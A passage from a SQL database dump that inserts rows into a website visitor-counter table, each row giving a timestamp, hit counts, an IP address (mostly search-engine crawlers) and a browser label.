1540981554,2,2,0,0,'220.243.136.45','chrome'),(322698,1540981555,1,1,0,0,'220.243.135.31','chrome'),(322702,1540981556,1,1,0,0,'220.243.136.31','chrome'),(322707,1540981557,1,1,0,0,'220.243.136.37','chrome'),(322714,1540981558,1,1,0,0,'220.243.136.37','chrome'),(322720,1540981559,1,1,0,0,'220.243.135.237','chrome'),(322732,1540981560,2,2,0,0,'220.243.136.20','chrome'),(322736,1540981561,1,1,0,0,'220.243.135.213','chrome'),(322742,1540981562,1,1,0,0,'220.243.135.147','chrome'),(322754,1540981646,1,1,0,0,'178.154.244.11','other'),(322755,1540981960,2,2,0,0,'91.196.178.84','chrome'),(322756,1540982490,2,2,0,0,'46.219.217.179','chrome'),(322757,1540982680,2,2,0,0,'40.77.167.52','other'),(322758,1540982822,2,2,0,0,'91.196.178.136','chrome'),(322759,1540982972,1,1,0,0,'66.249.75.220','chrome'),(322760,1540983380,1,1,0,0,'178.154.244.11','other'),(322761,1540983453,1,1,0,0,'91.196.177.46','chrome'),(322762,1540983785,2,2,0,0,'91.196.178.84','chrome'),(322763,1540983843,1,1,0,0,'40.77.167.41','other'),(322764,1540983892,1,1,0,0,'66.249.75.16','chrome'),(322765,1540984030,1,1,0,0,'193.160.224.150','chrome'),(322766,1540984462,1,1,0,0,'66.249.75.201','chrome'),(322767,1540984463,2,2,0,0,'66.249.75.218','chrome'),(322768,1540984619,2,2,0,0,'40.77.167.52','other'),(322769,1540984804,1,1,0,0,'66.249.75.220','chrome'),(322770,1540984891,1,1,0,0,'66.249.75.222','chrome'),(322771,1540985075,1,1,0,0,'216.244.66.241','other'),(322772,1540985635,1,1,0,0,'46.229.168.147','other'),(322773,1540985637,1,1,0,0,'46.229.168.143','other'),(322774,1540985732,1,1,0,0,'8.29.198.25','other'),(322775,1540986682,2,2,0,0,'66.249.75.201','chrome'),(322776,1540986683,22,22,0,0,'66.249.75.218','chrome'),(322777,1540986697,20,20,0,0,'66.249.75.195','chrome'),(322778,1540986731,1,1,0,0,'216.244.66.241','other'),(322779,1540986780,2,2,0,0,'66.249.75.199','chrome'),(322780,1540986788,1,1,0,0,'66.249.75.220','chrome'),(322781,1540987098,2,2,0,0,'40.77.167.159','other'),(322782,1540987390,1,1,0,0,'66.249.75.222','chrome'),(322783,1540987550,2,2,0,0,'8.29.198.26','other'),(322784,1540987866,1,1,0,0,'91.196.178.186','chrome'),(322785,1540988395,13,13,0,0,'66.249.75.195','chrome'),(322786,1540988397,14,14,0,0,'66.249.75.218','chrome'),(322787,1540988420,2,2,0,0,'66.249.75.199','chrome'),(322788,1540988421,4,4,0,0,'66.249.75.220','chrome'),(322789,1540988511,3,3,0,0,'66.249.75.13','chrome'),(322790,1540988528,3,3,0,0,'66.249.75.222','chrome'),(322791,1540988586,1,1,0,0,'66.249.75.201','chrome'),(322792,1540988676,1,1,0,0,'66.249.75.29','chrome'),(322793,1540988677,1,1,0,0,'66.249.75.15','chrome'),(322794,1540988731,2,2,0,0,'91.196.178.133','firefox'),(322795,1540988766,1,1,0,0,'66.249.75.16','chrome'),(322796,1540989069,3,0,3,0,'37.187.26.42',''),(322797,1540989484,1,1,0,0,'62.205.134.182','msie'),(322798,1540989776,2,2,0,0,'66.249.75.16','chrome'),(322799,1540990217,2,2,0,0,'91.196.178.84','chrome'),(322800,1540990285,1,1,0,0,'46.211.149.231','chrome'),(322801,1540990398,1,1,0,0,'5.45.207.79','other'),(322802,1540990402,2,2,0,0,'178.154.244.29','other'),(322803,1540990403,1,1,0,0,'178.154.244.11','other'),(322804,1540990566,3,3,0,0,'66.249.75.218','chrome'),(322805,1540990574,1,1,0,0,'216.244.66.241','other'),(322806,1540990638,2,2,0,0,'66.249.75.13','chrome'),(322807,1540990686,1,1,0,0,'66.249.75.195','chrome'),(322808,1540990754,1,1,0,0,'66.249.75.199','chrome'),(322809,1540990755,1,1,0,0,'66.249.75.222','chrome'),(322810,1540991340,1,1,0,0,'87.250.224.47','other'),(322811,1540991341,2,2,0,0,'178.154.244.29','other'),(322812,1540991605,1,1,0,0,'66.249.75.13','chrome'),(322813,1540991706,2,2,0,0,'91.196.178.166','chrome'),(322814,1540991737,1,1,0,0,'141.8.142.103','other'),(322816,1540991771,1,1,0,0,'66.249.75.15','chrome'),(322817,1540991784,1,1,0,0,'95.163.255.99','other'),(322818,1540991787,1,1,0,0,'95.163.255.97','other'),(322819,1540992051,2,2,0,0,'40.77.167.41','other'),(322820,1540992274,2,2,0,0,'66.249.75.218','chrome'),(322821,1540992315,82,82,0,0,'144.76.81.72','other'),(322822,1540992326,1,1,0,0,'66.249.75.222','chrome'),(322823,1540992394,1,1,0,0,'66.249.75.16','chrome'),(322824,1540992484,2,2,0,0,'66.249.75.195','chrome'),(322825,1540992749,1,1,0,0,'66.249.75.15','chrome'),(322826,1540993218,70,70,0,0,'144.76.81.72','other'),(322827,1540993431,2,2,0,0,'178.154.244.11','other'),(322828,1540993485,1,1,0,0,'178.154.244.29','other'),(322829,1540993493,267,267,0,0,'144.76.71.176','other'),(322830,1540993549,1,1,0,0,'66.249.75.195','chrome'),(322831,1540993569,1,1,0,0,'5.45.207.19','other'),(322832,1540993571,1,1,0,0,'5.45.207.79','other'),(322833,1540993903,2,2,0,0,'66.249.75.199','chrome'),(322834,1540993979,1,1,0,0,'46.229.168.145','other'),(322835,1540993981,1,1,0,0,'46.229.168.143','other'),(322836,1540994899,1,1,0,0,'95.135.210.243','chrome'),(322837,1540994933,1,1,0,0,'46.229.168.142','other'),(322838,1540994935,1,1,0,0,'46.229.168.148','other'),(322839,1540994939,1,1,0,0,'66.249.75.199','chrome'),(322840,1540995253,2,2,0,0,'91.196.178.58','chrome'),(322841,1540995273,1,1,0,0,'216.244.66.241','other'),(322842,1540995281,3,3,0,0,'176.105.197.210','chrome'),(322843,1540996301,1,1,0,0,'95.163.255.93','other'),(322844,1540996304,1,1,0,0,'95.163.255.98','other'),(322845,1540996394,1,1,0,0,'66.249.75.30','chrome'),(322846,1540996398,1,1,0,0,'66.249.75.13','chrome'),(322847,1540996511,1,1,0,0,'67.231.16.204','other'),(322848,1540996583,1,1,0,0,'8.29.198.27','other'),(322849,1540996710,1,1,0,0,'91.196.178.58','chrome'),(322850,1540996946,2,2,0,0,'95.132.48.74','firefox'),(322851,1540997057,1,1,0,0,'40.77.167.24','other'),(322852,1540997307,1,1,0,0,'95.163.255.97','other'),(322853,1540997310,1,1,0,0,'95.163.255.96','other'),(322854,1540997484,2,2,0,0,'91.242.162.45','other'),(322855,1540997485,1,1,0,0,'66.249.75.15','chrome'),(322856,1540997521,1,1,0,0,'178.154.244.11','other'),(322857,1540997639,1,1,0,0,'40.77.167.41','other'),(322858,1540997931,1,1,0,0,'40.77.167.52','other'),(322859,1540997938,1,1,0,0,'157.55.39.200','other'),(322860,1540997979,11,11,0,0,'23.237.4.26','other'),(322861,1540998112,1,1,0,0,'66.249.75.195','chrome'),(322862,1540998113,2,2,0,0,'66.249.75.220','chrome'),(322863,1540998375,1,1,0,0,'66.249.75.201','chrome'),(322864,1540998457,2,2,0,0,'8.29.198.25','other'),(322865,1540998917,1,1,0,0,'40.77.167.41','other'),(322866,1540999497,2,2,0,0,'66.249.75.218','chrome'),(322867,1540999737,1,1,0,0,'66.249.75.28','chrome'),(322868,1540999738,1,1,0,0,'66.249.69.144','chrome'),(322869,1540999760,1,1,0,0,'66.249.75.220','chrome'),(322870,1541000323,3,3,0,0,'216.244.66.241','other'),(322871,1541001285,1,1,0,0,'46.211.53.113','chrome'),(322872,1541001376,1,1,0,0,'66.249.75.16','chrome'),(322873,1541001458,1,1,0,0,'66.249.75.220','chrome'),(322874,1541001530,3,3,0,0,'213.159.251.221','chrome'),(322875,1541001542,1,1,0,0,'46.61.111.155','chrome'),(322876,1541001765,1,1,0,0,'40.77.167.48','other'),(322877,1541001766,1,1,0,0,'66.249.75.13','chrome'),(322878,1541002259,1,1,0,0,'40.77.167.24','other'),(322879,1541003496,1,1,0,0,'180.76.15.9','other'),(322880,1541003984,2,2,0,0,'31.134.112.83','chrome'),(322881,1541004929,1,0,1,0,'66.249.75.195',''),(322882,1541005002,1,1,0,0,'66.249.75.218','chrome'),(322883,1541005089,1,1,0,0,'66.249.75.16','chrome'),(322884,1541005206,1,1,0,0,'66.249.75.13','chrome'),(322885,1541005296,1,1,0,0,'66.249.75.199','chrome'),(322886,1541005297,1,1,0,0,'66.249.75.222','chrome'),(322887,1541005497,1,1,0,0,'202.46.55.90','chrome'),(322888,1541005499,1,1,0,0,'202.46.51.27','chrome'),(322889,1541005566,2,2,0,0,'91.196.178.188','chrome'),(322890,1541005936,1,1,0,0,'95.163.255.114','other'),(322891,1541005946,1,1,0,0,'95.163.255.113','other'),(322892,1541006052,1,1,0,0,'40.77.167.41','other'),(322893,1541006508,2,2,0,0,'66.249.75.195','chrome'),(322894,1541006590,1,1,0,0,'66.249.75.201','chrome'),(322895,1541006600,3,3,0,0,'66.249.75.218','chrome'),(322896,1541006847,1,1,0,0,'66.249.75.28','chrome'),(322897,1541006850,1,1,0,0,'66.249.75.15','chrome'),(322898,1541006899,2,2,0,0,'66.249.75.199','chrome'),(322899,1541006900,1,1,0,0,'66.249.75.220','chrome'),(322900,1541006974,2,2,0,0,'46.211.106.11','chrome'),(322901,1541007374,1,1,0,0,'66.249.75.16','chrome'),(322902,1541007412,1,1,0,0,'95.163.255.97','other'),(322903,1541007414,1,1,0,0,'95.163.255.93','other'),(322904,1541007431,1,1,0,0,'46.211.53.150','other'),(322905,1541007438,1,1,0,0,'8.29.198.25','other'),(322906,1541007948,1,1,0,0,'46.211.106.11','chrome'),(322907,1541007959,1,1,0,0,'46.211.47.241','other'),(322908,1541008765,1,1,0,0,'66.249.75.201','chrome'),(322909,1541008767,1,1,0,0,'66.249.75.218','chrome'),(322910,1541008867,5,5,0,0,'178.154.244.29','other'),(322911,1541008930,2,2,0,0,'46.211.106.11','chrome'),(322912,1541008941,1,1,0,0,'157.55.39.88','other'),(322913,1541009346,1,1,0,0,'8.29.198.27','other'),(322914,1541009541,4,4,0,0,'178.154.244.11','other'),(322915,1541009589,1,1,0,0,'8.29.198.26','other'),(322916,1541009856,1,1,0,0,'66.249.75.13','chrome'),(322917,1541010130,2,2,0,0,'178.154.244.29','other'),(322918,1541010282,1,1,0,0,'66.102.9.136','chrome'),(322919,1541010283,1,1,0,0,'46.211.20.248','chrome'),(322920,1541010442,1,1,0,0,'66.249.75.201','chrome'),(322921,1541010445,1,1,0,0,'66.249.75.218','chrome'),(322922,1541010459,1,1,0,0,'193.106.30.98','firefox'),(322923,1541010594,1,1,0,0,'66.249.75.199','chrome'),(322924,1541011055,2,2,0,0,'46.211.124.230','chrome'),(322925,1541011125,1,1,0,0,'207.46.13.222','other'),(322926,1541011304,1,1,0,0,'5.45.207.79','other'),(322927,1541011316,2,2,0,0,'178.154.244.29','other'),(322928,1541013063,2,2,0,0,'66.249.75.201','chrome'),(322929,1541013064,1,1,0,0,'66.249.75.218','chrome'),(322930,1541013177,1,1,0,0,'66.249.75.222','chrome'),(322931,1541013510,2,2,0,0,'91.196.178.78','chrome'),(322932,1541014139,1,1,0,0,'66.249.75.30','chrome'),(322933,1541014140,1,1,0,0,'66.249.75.15','chrome'),(322934,1541014389,2,2,0,0,'66.249.75.220','chrome'),(322935,1541014682,1,1,0,0,'80.77.37.152','chrome');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (322936,1541014879,1,1,0,0,'66.249.75.201','chrome'),(322937,1541014881,1,1,0,0,'66.249.75.218','chrome'),(322938,1541015088,1,1,0,0,'66.249.75.199','chrome'),(322939,1541015216,1,1,0,0,'91.196.178.163','chrome'),(322940,1541015876,1,1,0,0,'188.163.18.8','chrome'),(322941,1541016226,1,1,0,0,'66.249.75.195','chrome'),(322942,1541016227,1,1,0,0,'66.249.75.220','chrome'),(322943,1541016634,1,1,0,0,'157.55.39.56','other'),(322944,1541017420,1,1,0,0,'54.36.148.92','other'),(322945,1541017859,1,1,0,0,'176.118.166.51','chrome'),(322946,1541017979,1,1,0,0,'54.36.148.98','other'),(322947,1541018148,1,1,0,0,'46.211.150.171','chrome'),(322948,1541018265,1,1,0,0,'54.36.148.68','other'),(322949,1541018283,1,1,0,0,'8.29.198.26','other'),(322950,1541018954,1,1,0,0,'54.36.149.100','other'),(322951,1541019060,1,1,0,0,'54.36.148.190','other'),(322952,1541019282,1,1,0,0,'37.73.252.255','other'),(322953,1541019311,1,1,0,0,'54.36.148.47','other'),(322954,1541019510,1,1,0,0,'54.36.148.25','other'),(322955,1541019676,2,2,0,0,'157.55.39.56','other'),(322956,1541019692,1,1,0,0,'54.36.148.196','other'),(322957,1541020208,1,1,0,0,'54.36.149.6','other'),(322958,1541020220,2,2,0,0,'91.196.178.188','chrome'),(322959,1541020235,2,2,0,0,'8.29.198.27','other'),(322960,1541020450,1,1,0,0,'54.36.148.50','other'),(322961,1541020521,1,1,0,0,'46.211.48.185','other'),(322962,1541020546,1,1,0,0,'216.244.66.241','other'),(322963,1541020633,1,1,0,0,'54.36.149.90','other'),(322964,1541020681,1,1,0,0,'54.36.148.104','other'),(322965,1541020738,2,2,0,0,'66.249.75.199','chrome'),(322966,1541020739,2,2,0,0,'66.249.75.222','chrome'),(322967,1541021121,1,1,0,0,'66.249.75.201','chrome'),(322968,1541021122,1,1,0,0,'66.249.75.218','chrome'),(322969,1541021220,1,1,0,0,'66.249.75.195','chrome'),(322970,1541021221,1,1,0,0,'66.249.75.220','chrome'),(322971,1541021292,1,1,0,0,'54.36.149.67','other'),(322972,1541021557,1,1,0,0,'54.36.148.176','other'),(322973,1541022243,1,1,0,0,'54.36.148.153','other'),(322974,1541022289,1,1,0,0,'54.36.149.97','other'),(322975,1541022315,1,1,0,0,'54.36.149.6','other'),(322976,1541022472,1,1,0,0,'54.36.148.66','other'),(322977,1541022498,1,1,0,0,'54.36.148.141','other'),(322978,1541023036,4,4,0,0,'66.249.75.195','chrome'),(322979,1541023244,1,1,0,0,'54.36.148.212','other'),(322980,1541023253,2,2,0,0,'66.249.75.220','chrome'),(322981,1541023423,15,15,0,0,'66.249.75.13','chrome'),(322982,1541023506,9,9,0,0,'66.249.75.15','chrome'),(322983,1541023598,4,4,0,0,'66.249.75.16','chrome'),(322984,1541023619,1,1,0,0,'46.229.168.152','other'),(322985,1541023622,1,1,0,0,'46.229.168.139','other'),(322986,1541023739,2,2,0,0,'66.249.75.218','chrome'),(322987,1541024210,2,2,0,0,'66.249.75.199','chrome'),(322988,1541024295,1,1,0,0,'54.36.149.9','other'),(322989,1541024446,1,1,0,0,'54.36.148.201','other'),(322990,1541024706,1,1,0,0,'66.249.75.220','chrome'),(322991,1541024970,14,14,0,0,'66.249.75.13','chrome'),(322992,1541024983,4,4,0,0,'66.249.75.15','chrome'),(322993,1541025036,1,1,0,0,'66.249.75.28','chrome'),(322994,1541025074,3,3,0,0,'66.249.75.16','chrome'),(322995,1541025785,1,1,0,0,'54.36.149.63','other'),(322996,1541025873,1,1,0,0,'40.77.167.136','other'),(322997,1541025906,1,1,0,0,'54.36.148.232','other'),(322998,1541026328,1,1,0,0,'216.244.66.241','other'),(322999,1541026643,1,1,0,0,'66.249.75.16','chrome'),(323000,1541026740,1,1,0,0,'46.229.168.154','other'),(323001,1541026742,1,1,0,0,'46.229.168.148','other'),(323002,1541026798,3,3,0,0,'66.249.75.13','chrome'),(323003,1541026824,1,1,0,0,'54.36.148.188','other'),(323004,1541026906,1,1,0,0,'46.229.168.149','other'),(323005,1541026908,1,1,0,0,'46.229.168.134','other'),(323006,1541027063,1,1,0,0,'66.249.75.222','chrome'),(323007,1541027527,2,2,0,0,'66.249.75.218','chrome'),(323008,1541027561,1,1,0,0,'66.249.75.16','chrome'),(323009,1541027600,1,1,0,0,'54.36.149.60','other'),(323010,1541027866,1,1,0,0,'54.36.148.86','other'),(323011,1541028055,1,1,0,0,'216.244.66.241','other'),(323012,1541028200,1,1,0,0,'54.36.148.125','other'),(323013,1541028375,1,1,0,0,'66.249.75.15','chrome'),(323014,1541028421,2,2,0,0,'66.249.75.195','chrome'),(323015,1541028720,2,2,0,0,'66.249.75.199','chrome'),(323016,1541028738,3,3,0,0,'66.249.75.218','chrome'),(323017,1541028764,1,1,0,0,'54.36.148.229','other'),(323018,1541028773,1,1,0,0,'54.36.149.2','other'),(323019,1541028834,1,1,0,0,'54.36.149.48','other'),(323020,1541028836,1,1,0,0,'23.229.105.162','chrome'),(323021,1541028931,1,1,0,0,'157.55.39.79','other'),(323022,1541029128,1,1,0,0,'8.29.198.25','other'),(323023,1541029147,2,2,0,0,'3.121.85.98','other'),(323024,1541029687,1,1,0,0,'54.36.148.182','other'),(323025,1541029716,1,1,0,0,'54.36.149.54','other'),(323026,1541029825,1,1,0,0,'66.249.75.220','chrome'),(323027,1541030228,1,1,0,0,'46.229.168.153','other'),(323028,1541030231,1,1,0,0,'46.229.168.139','other'),(323029,1541030836,1,1,0,0,'54.36.148.39','other'),(323030,1541030887,2,2,0,0,'66.249.75.201','chrome'),(323032,1541030916,2,2,0,0,'66.249.75.195','chrome'),(323033,1541030918,3,3,0,0,'66.249.75.218','chrome'),(323034,1541031111,1,1,0,0,'8.29.198.27','other'),(323035,1541031257,1,1,0,0,'66.249.75.13','chrome'),(323036,1541031342,1,1,0,0,'8.29.198.26','other'),(323037,1541031535,1,1,0,0,'46.229.168.136','other'),(323038,1541031537,1,1,0,0,'46.229.168.138','other'),(323039,1541031931,1,1,0,0,'54.36.148.237','other'),(323040,1541032303,1,1,0,0,'54.36.149.21','other'),(323041,1541032330,2,2,0,0,'52.53.201.78','chrome'),(323042,1541032442,1,1,0,0,'66.249.75.15','chrome'),(323043,1541032482,1,1,0,0,'216.244.66.241','other'),(323044,1541032505,2,2,0,0,'66.249.75.201','chrome'),(323045,1541032512,1,1,0,0,'66.249.75.220','chrome'),(323046,1541032527,1,1,0,0,'66.249.75.195','chrome'),(323047,1541032529,3,3,0,0,'66.249.75.218','chrome'),(323048,1541032587,3,3,0,0,'66.249.75.199','chrome'),(323049,1541032652,1,1,0,0,'66.249.75.222','chrome'),(323050,1541032753,17,17,0,0,'148.251.9.145','other'),(323051,1541032835,1,1,0,0,'95.163.255.92','other'),(323052,1541032837,1,1,0,0,'95.163.255.94','other'),(323053,1541033502,1,1,0,0,'216.244.66.241','other'),(323054,1541033638,1,1,0,0,'54.36.149.106','other'),(323055,1541033725,1,1,0,0,'54.36.148.59','other'),(323056,1541033844,2,2,0,0,'95.163.255.117','other'),(323057,1541033850,2,2,0,0,'95.163.255.116','other'),(323058,1541033859,1,1,0,0,'95.163.255.114','other'),(323059,1541033867,4,4,0,0,'95.163.255.107','other'),(323060,1541033874,3,3,0,0,'95.163.255.104','other'),(323061,1541033880,2,2,0,0,'95.163.255.106','other'),(323062,1541033923,1,1,0,0,'95.163.255.103','other'),(323063,1541033930,4,4,0,0,'95.163.255.118','other'),(323064,1541033951,2,2,0,0,'95.163.255.109','other'),(323065,1541033965,1,1,0,0,'95.163.255.119','other'),(323066,1541034309,1,1,0,0,'46.229.168.139','other'),(323067,1541034311,1,1,0,0,'46.229.168.142','other'),(323068,1541034558,1,1,0,0,'180.76.15.144','other'),(323069,1541034561,1,1,0,0,'180.76.15.13','other'),(323070,1541034659,1,1,0,0,'54.36.148.13','other'),(323071,1541034729,1,1,0,0,'157.55.39.56','other'),(323072,1541034758,1,1,0,0,'54.36.148.57','other'),(323073,1541034763,1,1,0,0,'95.163.255.102','other'),(323074,1541034769,1,1,0,0,'95.163.255.105','other'),(323075,1541034845,1,1,0,0,'180.76.15.140','other'),(323076,1541034846,1,1,0,0,'180.76.15.137','other'),(323077,1541034907,1,1,0,0,'54.36.149.83','other'),(323078,1541035047,1,1,0,0,'54.36.149.38','other'),(323079,1541035274,4,4,0,0,'66.249.75.220','chrome'),(323080,1541035411,6,6,0,0,'66.249.75.195','chrome'),(323081,1541035413,2,2,0,0,'66.249.75.222','chrome'),(323082,1541035556,5,5,0,0,'66.249.75.218','chrome'),(323083,1541035600,4,4,0,0,'66.249.75.199','chrome'),(323084,1541035706,1,1,0,0,'54.36.148.174','other'),(323085,1541035841,2,2,0,0,'66.78.34.162','chrome'),(323086,1541036418,1,1,0,0,'157.55.39.56','other'),(323087,1541036714,1,1,0,0,'66.249.75.201','chrome'),(323088,1541036749,1,1,0,0,'54.36.148.155','other'),(323089,1541036768,1,1,0,0,'54.36.148.128','other'),(323090,1541036812,1,1,0,0,'66.249.75.30','chrome'),(323091,1541036814,1,1,0,0,'66.249.75.16','chrome'),(323092,1541037382,4,4,0,0,'66.249.75.195','chrome'),(323093,1541037383,4,4,0,0,'66.249.75.218','chrome'),(323094,1541037742,1,1,0,0,'54.36.148.159','other'),(323095,1541037897,1,1,0,0,'54.36.148.194','other'),(323096,1541037927,1,1,0,0,'54.36.148.54','other'),(323097,1541038386,1,1,0,0,'95.163.255.94','other'),(323098,1541038391,1,1,0,0,'95.163.255.93','other'),(323099,1541038401,2,2,0,0,'178.154.244.29','other'),(323100,1541038453,1,1,0,0,'54.36.148.225','other'),(323101,1541038581,4,4,0,0,'216.244.66.241','other'),(323102,1541038677,1,1,0,0,'46.229.168.140','other'),(323103,1541038679,1,1,0,0,'46.229.168.153','other'),(323104,1541038782,1,1,0,0,'54.36.148.79','other'),(323105,1541039139,2,2,0,0,'66.249.75.195','chrome'),(323106,1541039141,2,2,0,0,'66.249.75.218','chrome'),(323107,1541039159,2,2,0,0,'66.249.75.199','chrome'),(323108,1541039221,1,1,0,0,'66.249.75.220','chrome'),(323109,1541039380,1,1,0,0,'54.36.148.111','other'),(323110,1541039589,1,1,0,0,'46.229.168.140','other'),(323111,1541039591,1,1,0,0,'46.229.168.138','other'),(323112,1541039697,1,1,0,0,'54.36.149.83','other'),(323113,1541039966,1,1,0,0,'8.29.198.27','other'),(323114,1541040040,2,2,0,0,'34.217.53.70','chrome'),(323115,1541040374,1,1,0,0,'54.36.148.70','other'),(323116,1541040387,1,1,0,0,'54.36.148.128','other'),(323117,1541040616,2,2,0,0,'95.163.255.114','other'),(323118,1541040757,1,1,0,0,'54.36.149.8','other'),(323119,1541040915,1,1,0,0,'66.249.75.201','chrome'),(323120,1541040944,1,1,0,0,'66.249.75.220','chrome'),(323121,1541041059,1,1,0,0,'54.36.148.249','other'),(323122,1541041272,1,1,0,0,'54.36.148.116','other'),(323123,1541041478,1,1,0,0,'54.36.148.59','other'),(323124,1541041482,1,1,0,0,'46.229.168.129','other'),(323125,1541041485,1,1,0,0,'46.229.168.138','other'),(323126,1541041861,1,1,0,0,'54.36.148.34','other'),(323127,1541041988,1,1,0,0,'8.29.198.27','other'),(323128,1541042039,1,1,0,0,'54.36.148.22','other'),(323129,1541042069,1,1,0,0,'54.36.149.84','other'),(323130,1541042144,1,1,0,0,'54.36.148.70','other'),(323131,1541042261,1,1,0,0,'8.29.198.25','other'),(323132,1541042577,1,1,0,0,'66.249.75.201','chrome'),(323133,1541042581,1,1,0,0,'66.249.75.218','chrome'),(323134,1541043992,1,1,0,0,'54.36.149.67','other'),(323135,1541044122,1,1,0,0,'54.36.148.91','other'),(323136,1541044336,1,1,0,0,'216.244.66.241','other'),(323137,1541044426,1,1,0,0,'46.229.168.132','other'),(323138,1541044428,1,1,0,0,'46.229.168.146','other'),(323139,1541044432,1,1,0,0,'66.249.75.195','chrome'),(323140,1541044433,1,1,0,0,'66.249.75.218','chrome'),(323141,1541044493,1,1,0,0,'66.249.75.201','chrome'),(323142,1541044496,1,1,0,0,'66.249.75.220','chrome'),(323143,1541044552,1,1,0,0,'66.249.75.199','chrome'),(323144,1541044553,1,1,0,0,'66.249.75.222','chrome'),(323145,1541044559,1,1,0,0,'54.36.148.101','other'),(323146,1541044697,1,1,0,0,'54.36.148.30','other'),(323147,1541044974,1,1,0,0,'54.36.149.78','other'),(323148,1541045125,1,1,0,0,'54.36.148.36','other'),(323149,1541045295,1,1,0,0,'216.244.66.241','other'),(323150,1541045558,1,1,0,0,'54.36.148.14','other'),(323151,1541045750,1,1,0,0,'66.249.75.15','chrome'),(323152,1541046224,1,1,0,0,'54.36.148.98','other'),(323153,1541046238,1,1,0,0,'95.163.255.92','other'),(323154,1541046243,1,1,0,0,'95.163.255.97','other'),(323155,1541046248,2,2,0,0,'66.249.75.199','chrome'),(323156,1541046279,1,1,0,0,'66.249.75.220','chrome'),(323157,1541046371,1,1,0,0,'66.249.75.201','chrome'),(323158,1541046372,3,3,0,0,'66.249.75.218','chrome'),(323159,1541046377,1,1,0,0,'66.249.75.195','chrome'),(323160,1541046489,1,1,0,0,'46.229.168.151','other'),(323161,1541046492,1,1,0,0,'46.229.168.145','other'),(323162,1541046509,1,1,0,0,'216.244.66.241','other'),(323163,1541046625,1,1,0,0,'54.36.148.208','other'),(323164,1541047042,1,1,0,0,'188.230.43.254','other'),(323165,1541047493,1,1,0,0,'66.249.75.222','chrome'),(323166,1541047592,1,1,0,0,'54.36.149.70','other'),(323167,1541047669,1,1,0,0,'54.36.149.32','other'),(323168,1541047703,2,2,0,0,'93.119.227.34','other'),(323169,1541047765,1,1,0,0,'54.36.148.154','other'),(323170,1541047839,2,2,0,0,'66.249.75.195','chrome'),(323171,1541047862,2,1,1,0,'66.249.75.218',''),(323172,1541047930,2,2,0,0,'66.249.75.220','chrome'),(323173,1541048006,1,1,0,0,'66.249.75.199','chrome'),(323174,1541048344,1,1,0,0,'54.36.148.210','other'),(323175,1541048491,1,1,0,0,'46.229.168.142','other'),(323176,1541048661,1,1,0,0,'46.229.168.134','other'),(323177,1541048666,1,1,0,0,'46.229.168.140','other'),(323178,1541048866,1,1,0,0,'54.36.149.63','other'),(323179,1541048888,1,1,0,0,'54.36.148.129','other'),(323180,1541048899,1,1,0,0,'66.249.75.13','chrome'),(323181,1541049000,1,1,0,0,'216.244.66.241','other'),(323182,1541049067,1,1,0,0,'54.36.148.46','other'),(323183,1541049073,1,1,0,0,'37.73.129.91','chrome'),(323184,1541049394,1,1,0,0,'46.229.168.153','other'),(323185,1541049398,1,1,0,0,'46.229.168.137','other'),(323186,1541049475,1,1,0,0,'54.36.148.36','other'),(323187,1541049570,1,1,0,0,'54.36.148.232','other'),(323188,1541049866,1,1,0,0,'54.36.149.77','other'),(323189,1541050032,1,1,0,0,'188.230.43.254','other'),(323190,1541050807,1,1,0,0,'8.29.198.26','other'),(323191,1541050831,1,1,0,0,'216.244.66.241','other'),(323192,1541050969,1,1,0,0,'54.36.148.102','other'),(323193,1541050971,1,1,0,0,'54.36.149.19','other'),(323194,1541051010,1,1,0,0,'54.36.148.97','other'),(323195,1541051207,1,1,0,0,'66.249.75.218','chrome'),(323196,1541051239,1,1,0,0,'54.36.148.35','other'),(323197,1541051450,1,1,0,0,'66.249.75.201','chrome'),(323198,1541051458,2,2,0,0,'66.249.75.199','chrome'),(323199,1541051480,1,0,1,0,'66.249.75.220',''),(323200,1541051579,1,0,1,0,'66.249.75.222',''),(323201,1541051677,1,1,0,0,'66.249.75.220','chrome'),(323202,1541052045,1,1,0,0,'54.36.148.127','other'),(323203,1541052301,1,1,0,0,'66.249.69.158','chrome'),(323204,1541052302,1,1,0,0,'66.249.69.140','chrome'),(323205,1541052561,1,1,0,0,'54.36.148.156','other'),(323206,1541052854,1,1,0,0,'8.29.198.27','other'),(323207,1541052870,1,1,0,0,'54.36.149.65','other'),(323208,1541052941,1,1,0,0,'54.36.149.84','other'),(323209,1541052960,1,1,0,0,'54.36.148.113','other'),(323210,1541053124,1,1,0,0,'54.36.148.82','other'),(323211,1541053145,1,1,0,0,'8.29.198.26','other'),(323212,1541053535,1,1,0,0,'66.249.75.199','chrome'),(323213,1541053536,1,1,0,0,'66.249.75.220','chrome'),(323214,1541053589,1,1,0,0,'54.36.149.15','other'),(323215,1541053595,2,2,0,0,'66.249.75.195','chrome'),(323216,1541053596,1,1,0,0,'66.249.75.222','chrome'),(323217,1541053604,1,1,0,0,'66.249.75.218','chrome'),(323218,1541053667,5,5,0,0,'91.196.178.79','chrome'),(323219,1541053680,1,1,0,0,'54.36.148.182','other'),(323220,1541053811,1,1,0,0,'54.36.148.250','other'),(323221,1541054537,1,1,0,0,'54.36.149.27','other'),(323222,1541054932,1,1,0,0,'95.163.255.95','other'),(323223,1541054935,1,1,0,0,'95.163.255.99','other'),(323224,1541055200,1,1,0,0,'54.36.148.67','other'),(323225,1541055358,2,2,0,0,'91.196.178.79','chrome'),(323226,1541055459,2,2,0,0,'54.165.59.7','other'),(323227,1541055649,1,1,0,0,'146.185.157.240','chrome'),(323228,1541055871,2,2,0,0,'178.154.244.29','other'),(323229,1541055989,1,1,0,0,'54.36.149.5','other'),(323230,1541056433,3,3,0,0,'91.196.178.79','chrome'),(323231,1541056455,4,4,0,0,'54.165.59.7','other'),(323232,1541056683,1,1,0,0,'54.36.149.51','other'),(323233,1541057330,1,1,0,0,'46.229.168.154','other'),(323234,1541057332,1,1,0,0,'46.229.168.145','other'),(323235,1541057370,2,2,0,0,'157.55.39.79','other'),(323236,1541057443,2,2,0,0,'91.196.178.79','chrome'),(323237,1541057515,1,1,0,0,'54.36.149.103','other'),(323238,1541057721,1,1,0,0,'54.165.59.7','other'),(323239,1541058159,1,1,0,0,'54.36.149.88','other'),(323240,1541058258,1,1,0,0,'54.36.148.129','other'),(323241,1541058500,1,1,0,0,'54.36.148.81','other'),(323242,1541058593,2,2,0,0,'66.249.75.201','chrome'),(323243,1541058594,3,3,0,0,'66.249.75.220','chrome'),(323244,1541058637,5,5,0,0,'66.249.75.195','chrome'),(323245,1541058673,1,1,0,0,'54.36.148.207','other'),(323246,1541058727,2,2,0,0,'66.249.75.222','chrome'),(323247,1541058737,2,2,0,0,'66.249.75.218','ch